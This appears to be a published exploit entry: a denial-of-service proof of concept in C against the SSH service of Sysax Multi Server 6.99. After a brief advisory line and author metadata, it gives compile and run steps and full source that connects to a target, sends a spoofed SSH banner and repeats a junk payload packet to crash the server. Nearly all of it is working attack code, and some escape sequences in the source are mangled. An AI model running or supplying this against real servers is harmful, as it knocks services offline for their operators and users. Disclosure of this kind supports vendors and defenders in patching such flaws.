Sysax Multi Server version 6.9.9 suffers from an SSH related denial of service vulnerability.
# Exploit Title: Sysax Multi Server 6.99 - SSH Denial of Service
# Date: 2024-11-03
# Exploit Author: Yehia Elghaly (Mrvar0x)
# Vendor Homepage: https://www.sysax.com/
# Software Link: https://www.sysax.com/download/sysaxserv_setup.msi
# Version: Sysax Multi Server 6.99
# Tested on: Windows 10 x64
#Steps --> Compile (gcc -o ssh ssh.c)
#Steps --> Run (sudo ./ssh <Target IP> <Port>)
#Steps --> Crash (SSH Crashed)
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <netinet/tcp.h>
void error_handling(const char *message) {
perror(message);
exit(1);
}
int main(int argc, char *argv[]) {
if (argc != 3) {
printf("Usage: %s <IP> <Port>n", argv[0]);
exit(1);
}
const char *host = argv[1];
int port = atoi(argv[2]);
unsigned char packet[] = {0x01, 0x02, 0x03, 0x04, 0xAA, 0xBB, 0xCC, 0xDD,
0x12, 0x34, 0x56, 0x78, 0x9A, 0xBC, 0xDE, 0xF0,
0x44, 0x55, 0x66, 0x77, 0x88, 0x99, 0x00, 0xFF,
0x10, 0x20, 0x30, 0x40, 0x50, 0x60, 0x70, 0x80,
0x5A, 0x5A, 0x5A, 0x5A, 0x5A, 0x5A, 0x5A, 0x5A,
0x01, 0x23, 0x45, 0x67, 0x89, 0xAB, 0xCD, 0xEF,
0x0F, 0x0E, 0x0D, 0x0C, 0x0B, 0x0A, 0x09, 0x08,
0xF1, 0xE2, 0xD3, 0xC4, 0xB5, 0xA6, 0x97, 0x88,
0x12, 0x34, 0x56, 0x78, 0x90, 0xAB, 0xCD, 0xEF,
0x00, 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77,
0x88, 0x99, 0xAA, 0xBB, 0xCC, 0xDD, 0xEE, 0xFF,
0xFF, 0xEE, 0xDD, 0xCC, 0xBB, 0xAA, 0x99, 0x88,
0x77, 0x66, 0x55, 0x44, 0x33, 0x22, 0x11, 0x00,
};
int sock = socket(AF_INET, SOCK_STREAM, 0);
if (sock == -1) {
error_handling("Socket creation failed");
}
int flag = 1;
setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (char *)&flag, sizeof(int));
struct linger sl = {1, 0}; // Close immediately
setsockopt(sock, SOL_SOCKET, SO_LINGER, &sl, sizeof(sl));
struct sockaddr_in serv_addr;
memset(&serv_addr, 0, sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_addr.s_addr = inet_addr(host);
serv_addr.sin_port = htons(port);
if (connect(sock, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) == -1) {
error_handling("Connect failed");
}
const char *ssh_banner = "SSH-2.0-OpenSSH_7.1p1 Debian-5ubuntu1rn";
if (send(sock, ssh_banner, strlen(ssh_banner), 0) == -1) {
error_handling("Failed to send SSH banner");
}
usleep(100000);
for (int i = 0; i < 5; ++i) {
if (send(sock, packet, sizeof(packet), 0) == -1) {
error_handling("Failed to send payload");
}
usleep(50000); // Short delay between sends
}
printf("Payload sent successfully.n");
char buffer[1024];
ssize_t bytes_received = recv(sock, buffer, sizeof(buffer) - 1, 0);
if (bytes_received > 0) {
buffer[bytes_received] = ' ';
printf("Received response: %sn", buffer);
} else {
printf("No response received or connection closed.n");
}
close(sock);
return 0;
}